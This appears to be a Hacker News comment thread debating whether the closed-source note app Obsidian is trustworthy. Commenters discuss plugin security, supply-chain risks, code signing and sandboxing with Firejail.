There are many good reasons to trust Obsidian team (they are not VC backed, they clearly state they don’t own your data, you are not locked in). If you don’t trust them because they are not open-source then If you want to be a purist about it, then just use an open-source markdown editor instead.
Community plugins and the way they're approved and not reviewed over time due to limited resources is the main problem.
There are many facets to that. Plugins have unrestricted access, they can start servers, make http calls, read/write files ...
Plugins get approved once, but are never checked again.
And plugins are now increasing in number more rapidly, ...
Is this a Mac thing?
On Windows this is how most applications are distributed.
Same with Spotify etc.
Also even if it is open source, who really verifies the binary is built from the source published?
You should always be careful with closed source software. You should also be careful with open source software, unless you're building from source and manually checking the source in each update isn't malicious, which let's be real, nobody does.
I had to do some gap analysis between note-taking apps with a graph view functionality to allow me to visualise my knowledge-base.
Obsidian was my initial choice but I had grievances with it. I ended up going with Logseq for many reasons - yes it appears to be less mature however that doesn't mean that it is inferior by any measure (and open-source)
Don’t really see much of a reason to single out obsidian in this
I wouldn’t hold not being on the Mac App Store against it. The MAS is sort of a failed ecosystem with very low usage/engagement, and all the downsides of the iOS store like potentially lengthy review times (can be a lot longer than the iOS store since it seems to play second fiddle) and arbitrary capricious rejections when you’re just trying to ship innocuous bug fixes to users.
I think the increasingly widespread attitude that only open source software is good and trustworthy increasingly annoying and problematic.
Building software takes time and resources. Experienced show that most open source projects do not make enough money to make the resource investment worthwhile, much less the time investment.
I generally like people being able to out food on the table, and if that means I have to pay for their software to use it or get updates, then I am happy to do so if that software is of value for me.
That of course doesn‘t mean I appreciate unnecessary vendor lock in, hostile subscription models, etc. All of these things are common with proprietary software, but they are not inherent to it.
Obsidian is a great example. Easy to takeout open formats, generous licensing model and no aggressive licensing implementation that makes it impossible to use the software offline. The team behind it seems to be able to make a living and people can still feel safe about the access to their notes.
Even if its not open source, it would be great progress if we‘ve had more software like obsidian
Not being able to give granular permissions to folders is not the problem of an app which regardless of being open or closed source may be compromised. Remember that the risk is zero if and only if you avoid the risk, i.e. in this particular case do not install Obsidian.
Macos:
- does not have a granular permissions model as far as I know;
- deprecated sandbox-exec that allowed to achieve the above;
- macos appstore is a very strange phenomenon, I would not put much trust in it by default.
Obsidian:
- has a system of community plugins and themes which is dangerous and has been discussed multiple times[0]. But the problem of managing community plugins is not unique to them. Malicious npm packages, go modules and rust crates (and you name it) anyone?.. you are on your own here mostly. And you need to perform your own due diligence of those community supported random bits.
Obsidian could hugely benefit from an independent audit of the closed source base. That would help build trust in the core of their product.
[0]: https://www.emilebangma.com/Writings/Blog/An-open-letter-to-...
Obsidian is a startup that's been on my radar. It inspires me. They're able to go so far as to challenge Notion with their small team, which I appreciate. By the way, I'm not saying Notion is bad. I think it's revitalizing the industry.
On the other hand, I was unaware of the vulnerabilities in the Apple ecosystem. Or rather, I didn't think there would be. The article raised my awareness.
Plugin sandboxing is the answer to such community extension concerns, but then that's unfortunately only part of the bright future ahead...
I've used dozens of notetaking tools over the years. Some cloud-based, some markdown-based, some flashy apps, some plain-text, some open-source, and some closed-source. My takeaway from years of jumping between them is this: don't use closed-source notetaking software. Just don't do it. Even if your data is in markdown files, on your own computer, you're still probably stuck with proprietary markdown extensions, and at the very least, you're stuck with muscle memory for the app's UI that you'd have to translate to some new system eventually. Startup companies come and go, on a monthly basis. Developers move on to shiny new projects. You can't take that risk, or any other security risks, with your personal notes.
Somebody read that recent open letter to the Obsidian Team and realized the security implications rather than just the inconvenience :D
So far I have uninstalled all themes & plugins except the kanban board - I'm working on it. I'll use core obsidian and that's all.
I've known kepano (their CEO) for almost 20 years, he is an incredible builder and a solid human. My hunch is they would never act in an unsavory way to their users. I get that the point it could be more open (a community build would be slick), and yet it's an incredible product and worthy of financial support. I am glad to be a user and love that it's a part of my daily workflow.
The set of open source code and verifiable code overlap, but one doesn't always imply the other. In either case, provenance needs to be established. I think it would be reasonable for Obsidian to ship signed checksums and a public transparency log (e.g., Sigstore) for builds (plugins authors could do the same?). A more granular plugin permissions system would be great too, even though most plugins are OSS.
Would it be best to be closed source and pay to get the source code with 1 year updates, (except say license server unless you're enterprise)?
That way the author can still keep the source closed and those who want code can pay for it.
I very rarely see OSS being monetized successfully without a community fork destroying the original project.
OSS still requires money to maintain the project and sparse donations really don't really cut it.
This is ridiculous. The macOS app is signed.
codesign -dv /Applications/Obsidian.app
Executable=/Applications/Obsidian.app/Contents/MacOS/Obsidian
Identifier=md.obsidian
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20500 size=759 flags=0x10000(runtime) hashes=13+7 location=embedded
Signature size=8975
Timestamp=Sep 29, 2025 at 12:22:41 PM
Info.plist entries=39
TeamIdentifier=6JSW4SJWN9
Runtime Version=15.4.0
Sealed Resources version=2 rules=13 files=23
Internal requirements count=1 size=172
The scary thing is that nowadays everything is backdoored. And developers/product owners can even don't know about it. Obsidian is an electron app, thus uses npm, and with npm we now get like at least one malicious package per month. If they have package autoupdate it's just a matter of time and effort for an attacker to plant something shady there. This could be simple crypto-stealer, or this could be a way to access people's personal vaults.
> Obsidian’s source code is closed
When I toggle developer mode (Command + Option + i on my mac) I see what appears to be the source code (it’s an Electron app). Maybe it’s not the full source though. And I guess it’s very difficult to read since it’s minified.
It's a strange article. Yes it's not an open source, but based on what is the author suspicious? Any bad behaviours from the authors? Change of ownership? Plugin risks?
For me this is the least problematic non-open source software:
- non VC funded (like Mattermost enshitification after VC)
- open source formats
- community plugins with source code (it's JS)
I know this may go against the ethos of some folks on HN, but I switched to Apple Notes and haven't looked back. At the end of the day, you either use the tool or the tool uses you.
For diagrams, mindmaps, etc... I just use Freeform now -- screen capture or export the board as PDF to paste into my notes. It's deceptively flexible and more powerful than it would appear.
I really like the obsidian canvas.
It is astonishingly sharp
need obsidian open source alternative
But files obsidian works with are just bunch of .md files that can be viewed or edited with anything, nano, notepad, visual studio code etc. So does it really matter it is or it is not open source?
If you're a Linux user you might like Firejail for this.
--private=~/path/to/jail limits access to your home directory to ~/path/to/jail and when you don't want Obsidian to have internet access you can take it away with --net=none.